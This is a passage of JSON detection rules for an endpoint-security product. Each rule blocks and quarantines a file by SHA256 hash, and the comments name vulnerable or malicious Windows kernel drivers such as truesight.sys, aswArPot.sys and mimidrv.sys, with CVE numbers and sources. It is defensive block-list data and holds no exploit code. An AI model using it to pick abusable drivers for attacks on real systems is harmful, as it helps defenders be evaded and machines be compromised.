+ "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833132Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de3fe9e38a3e471599a831f583c3f568f7ecb9629a1b57621028f6934a636047", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25225aeb-b715-54d9-beb9-e75fea40a791", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973569Z", + "creation_date": "2026-03-23T11:45:29.973571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e1d47a497babbfd1c83905777b517ec87c65742bee7eb57a2273eca825d2272", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "253b43ba-71c2-592d-8090-e29b589b0080", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817942Z", + "creation_date": "2026-03-23T11:45:31.817946Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "2ed8c91ed5e634739ff0d5f61b058f5a043b3c50c8cd23ec9a76d1e6d562062a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2543e7d8-7d97-559c-8a88-8ec2eb942d0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618948Z", + "creation_date": "2026-03-23T11:45:29.618950Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ae065383a4ef5564a515d12adf18427f8d74cc15140edb95e5e2a51ca44fe42", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25500730-e86b-5557-a2c0-d5694c8450b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825698Z", + "creation_date": "2026-03-23T11:45:31.825700Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48b7d25417eef1ec854ef7fc7ce5a6009f5b85dfe0f849e8ef56251dc899f99c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2559c47b-d7bb-53fc-8128-6c54d58a1e46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148041Z", + "creation_date": "2026-03-23T11:45:31.148043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cd571311e5c8a420a53bdf0adb2b8a6542553c9d7c1434595875ad219bd3adad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "255f6f88-fc97-5a91-822c-4d7ac63feaf4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828441Z", + "creation_date": "2026-03-23T11:45:31.828443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98d90c58d6e7da9440f9bebfb6f2a6d7285a31f84acbae00c6d108b29a067b3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2569b812-f931-5ce8-a3f9-68660c758131", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817206Z", + "creation_date": "2026-03-23T11:45:31.817209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e83731992993c9bd1ce619bf3afcafee07a2e35ad797a4300748b174a811a10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "256aa586-78c1-551c-82b1-aee3653ba4a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161075Z", + "creation_date": "2026-03-23T11:45:31.161077Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1dc0310211470fd0f20ef69db63b332e493edf11fa192d02bec6ff2a9a380424", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "256b7a81-ba5b-518b-8e09-48a6b3c5f286", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465540Z", + "creation_date": "2026-03-23T11:45:30.465543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25707eb2-d59f-591b-b46b-6bdc769dff93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817842Z", + "creation_date": "2026-03-23T11:45:31.817844Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817853Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9450482ae96ad3b7b0fcf50f43c6a80be632643942aa044e58268eb5422b4219", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2570c2bf-f724-5f90-a9fc-8fe94ab74575", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491344Z", + "creation_date": "2026-03-23T11:45:31.491347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491355Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e09866276f58c2807315c78bd035622a182ea95ebb80714af69ca884b6a1f06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2577cf42-46f3-596d-8c00-33c7284e65e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500010Z", + "creation_date": "2026-03-23T11:45:31.500014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f658233bb32c1e6b23b0e70dd84294a5cbc5d44e3907e355e1da7683660a4672", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25839a57-1801-529b-9242-809a6a46716e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464598Z", + "creation_date": "2026-03-23T11:45:30.464601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.464610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4136f1eb11cc463a858393ea733d5f1c220a3187537626f7f5d63eccf7c5a03f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2590ea5c-2a39-5aa1-b1f2-14357e60afea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969364Z", + "creation_date": "2026-03-23T11:45:29.969366Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0c131bc8d6c8b5a2be32474474b1221bce1289c174c87e743ed4a512f5571d4", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2591776a-0d11-5790-8358-9c49cdafd039", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475828Z", + "creation_date": "2026-03-23T11:45:31.475832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475842Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0dfe6cc077baf31617f91334d12589801a98aaae7b712f7976df63e86e203e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "259eab04-77cf-5108-a3e4-0365cc226ccc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822273Z", + "creation_date": "2026-03-23T11:45:31.822275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"20a18c56859638b8ea44319510a109cf02faa32295c5a9f4a0020de2b67d16b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25a0b46e-df5f-5fb3-a4ba-e2b172aba933", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480429Z", + "creation_date": "2026-03-23T11:45:31.480433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b285a125b15f81d584919330b277d70d22d3d01f187bb2c10029f0927ea67066", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25a8189c-c3ca-5861-9603-0b261b889aa8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821521Z", + "creation_date": "2026-03-23T11:45:31.821523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821528Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8edce22f1222f23d7884cd8b4ce2c01172317a356f270abf95907839491d97e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25ad89a2-dc41-59cf-a148-7aae7f4305f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475416Z", + "creation_date": "2026-03-23T11:45:30.475419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e428c1d1cd7358e2c2f25ede45e718b22cb5d04634a4d1ec08a87e71248685b", + "comment": "Vulnerable Kernel Driver (aka mhyprotnap.sys) 
[https://www.loldrivers.io/drivers/75a66604-f024-4f11-8ba7-fdd64a0df3bf/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25b30dbe-b022-5a27-8841-4b5d11cd2b48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155753Z", + "creation_date": "2026-03-23T11:45:31.155755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cff7d3f12c0e6782d4875cf3efc18ad7c31676d16641de6d8d0275ba76058d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25b360ec-59f0-531b-ae3a-dd5c3061f565", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983010Z", + "creation_date": 
"2026-03-23T11:45:29.983014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c10c70be4e36fa9c98a4796c2b03db86398e2b07018550b7f0d58edabc553ad2", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25b3fe2c-4f62-5269-88b2-2c57290a8a05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455989Z", + "creation_date": "2026-03-23T11:45:30.455993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de09000bb9f5f81ff6c9ba239ea2498cff4e3decf6ae0220e4b0d64c3500acf8", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25bab5ca-8907-54b3-a8f4-709658efcd5e", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480244Z", + "creation_date": "2026-03-23T11:45:30.480246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cac5dc7c3da69b682097144f12a816530091d4708ca432a7ce39f6abe6616461", + "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25c4c79f-0b0d-50d2-9a79-31e20ab7ed09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981726Z", + "creation_date": "2026-03-23T11:45:29.981728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
